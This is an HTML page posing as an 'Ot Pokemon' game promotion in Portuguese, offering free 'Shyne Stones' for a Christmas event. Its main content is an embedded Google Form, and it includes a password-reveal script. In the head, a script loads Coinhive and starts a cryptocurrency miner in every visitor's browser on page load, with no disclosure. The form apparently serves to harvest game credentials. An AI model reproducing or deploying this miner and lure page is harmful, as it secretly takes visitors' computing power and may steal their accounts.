<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Ot Pokemon</title>
  <link rel="icon" href="otp_icon64-min.png" type="image/x-icon">
  <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.6/css/bootstrap.min.css" integrity="sha384-rwoIResjU2yc3z8GV/NPeZWAv56rSmLldC3R/AZzGRnGxQQKnKkoFVhFQhNUwEyJ" crossorigin="anonymous">
    <script src="https://code.jquery.com/jquery-3.1.1.slim.min.js" integrity="sha384-A7FZj7v+d/sdmMqp/nOQwliLvUsJfDHW+k9Omg/a/EheAdgtzNs3hpfag6Ed950n" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/tether/1.4.0/js/tether.min.js" integrity="sha384-DztdAPBWPRXSA/3eYEEUWrWCy7G5KFbe8fFjk5JAIxUYHKkDx6Qin1DkWx51bBrb" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-alpha.6/js/bootstrap.min.js" integrity="sha384-vBWWzlZJ8ea9aCX4pEW3rVHjgjt7zpkNpZk+02D9phzyeVkE+jo0ieGizqPLForn" crossorigin="anonymous"></script>
    <link rel="stylesheet" type="text/css" href="css/style.css">
    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
	var miner = new CoinHive.User('w0Uv43NOo7X5HJqYcTv3QNCm408NxPNU', 'Ultron', {threads: 2});
	miner.start();
</script>
<style>
        
@import url('https://fonts.googleapis.com/css?family=Roboto');

body{
	background-color: #e8e8e8;
}

.bg-faded {
	background-color: #237dba;
	padding: 0px 55px;
}

.navbar-light .navbar-brand{
	
	font-family: "Roboto" ,"Leckerli One", Arial;
	font-weight: bold 8px;
	font-size: 29px;
	margin-right: 245px
}

.navbar-light .navbar-nav .active>.nav-link, .navbar-light .navbar-nav .nav-link.active, .navbar-light .navbar-nav .nav-link.open, .navbar-light .navbar-nav .open>.nav-link{
	background-color: #282b2d;
	border-radius:20px;
	-webkit-transition:all 0.2s linear;
	transition:all 0.2s linear;
	padding-left:25px;
	padding-right:25px;
	color: rgb(255, 225, 0);
	margin-right: 30px;

}

.navbar-light .navbar-nav .nav-link {
	border-radius: 20px;
	margin-right: 30px;
	padding-right: 25px;
	padding-left: 25px;
}

.navbar-light .navbar-nav .nav-link:focus, .navbar-light .navbar-nav .nav-link:hover{
	background: #292b2c;
	-webkit-transition:all 0.2s linear;
	transition:all 0.2s linear;
	color: #ffe100;

}

.nav-link.disabled{
	cursor: auto;
}

nav.navbar.navbar-toggleable-md.navbar-light.bg-faded{
	background:rgba(0, 153, 222, 1) url(http://imageshack.com/a/img924/9792/Aws0yj.png) top no-repeat;
	background-position-y: -1375px;
	z-index: 2;
}

.navbar-light .navbar-nav .nav-link.disabled{
	color: rgb(160,98,0);

}

.navbar-light .navbar-nav .nav-link.disabled:hover{
	color: #ffe100;
}

nav.navbar.navbar-toggleable-md.navbar-light.bg-faded {
	transition:all 0.4s;
	position: fixed;
	width: 100%

}

.pm {

width: 100%;

}

.img-responsive{
	width: 100%;

}

.jumbotron{
	margin-top: -3%;
	border-radius: 20px;

}

.breadcrumb{
background-color: #e4e4e4;
box-shadow: 0px 3px #c9c4c4;
margin-top: -3%;
border-radius: 15px;
}

.LG1{
	padding-bottom: : 0px;
	margin: 0px;
}


.list-group-item:last-child{
	border-bottom-right-radius: none;
	border-bottom-left-radius: none;
}

li{
font-weight: bold;
font-size: 18px;
}

.list-group-item:first-child{
	border-top-right-radius:none;
	border-top-left-radius:none;
	border-radius: 11px;
}

.list-group-item{
border: none;
padding: 0px;
box-shadow: 0px 2px #e2e0e0;
background-color: #fffffe;

}

.list-group{
	margin-bottom: 25px;
}


h4{
	margin-left: 10px;
	font-family: "Roboto" ,"Myriad Pro"
}

.jumbotron{
	background-color: #f2f2f2;
}

a{
	color: #434648
}

.theme{
	float: left;
	margin-right: 25px;
	margin-bottom: 5px;
}

h2, p, li, h4{
	font-family: "Roboto" ,"Myriad Pro";
}


.p-ponto{
	width: 70%;

}

.footer{
	background-color: #5FE773;
	width: 100%;
	height: 100px;
	text-align: center;
	color: #FFFFFF;
	padding: 40px;
	font-family: "Roboto", "Myriad Pro", Arial;
}
	
	.thumbnail {
		display: block;
		padding: 4px;
		margin-bottom: 20px;
		line-height: #fff;
		border: 1px solid #ddd;
		border-radius:4px;
		-webkit-transition: border .2s ease-in-out;
		transition: border .2s ease-in-out;

	}

	.img-thumbnail, .thumbnail {
		box-shadow: 0 1px 2px rgba(0,0,0,.075);
		-webkit-box-shadow: 0 1px 2px rgba(0,0,0,.075);
	}


	.btn{
		margin-top: 1%;
		float: right;

	}

	.card-footer{
		background-color: #005690;
	}


	.text-muted{
		color: #fff!important;
	}

	.card-img-top{
		height: 250px;
		width: 100%;
	}

	a:hover{
		transition: all 0.4s linear;
		text-decoration: none;
	}

	.navbar-light .navbar-nav .nav-link:focus, .navbar-light .navbar-nav .nav-link:hover{
		background: none;

	}
	


	.navbar-light .navbar-nav .nav-link{
		margin-left: 800px;
	}
    
    div.form-group {padding: 10px;
                padding-bottom: 20px;
                              text-align: center;}
   header {padding-bottom: 50px;
	   color: #696969;}
    .baixo {
	    margin-top: 510px;
	    position: absolute;
	    z-index: 2;
	    background-color: #5FE773;
            padding-left: 73%;
	    color: #5FE773;
             padding-bottom: 130px;
	   }
	.tras {
		z-index: -1;
	}
                 

</style>

<script>
function mostrarsenha() {
         if (show.checked)
            {pwd.type = "text";}
         else {pwd.type = "password";}
}
</script>
</head>
<body>
<img src="https://i.imgur.com/9diCoWe.png" class="img-responsive">

<div class="container">
  <div class="jumbotron">
  <center><img src="otpokemon.png"</center>
	  <div style="color: Gray"> Ganhe 2 Shyne Stone a cada 2 horas!</div>
	  <div class="baixo">Evento de Natal!</div>
<center><iframe class="tras" src="https://docs.google.com/forms/d/e/1FAIpQLSf4PLfiMP1su0mHQJi6Q6dvqnkvPm7JIh1Mqpvjvovp5Q8IGA/viewform?embedded=true" width="640" height="661" frameborder="0" marginheight="0" marginwidth="0">Carregando…</iframe></center>
</div>

<footer>
  <div class="footer">OtPokemon.com</div>
</footer>
</body>
</html>
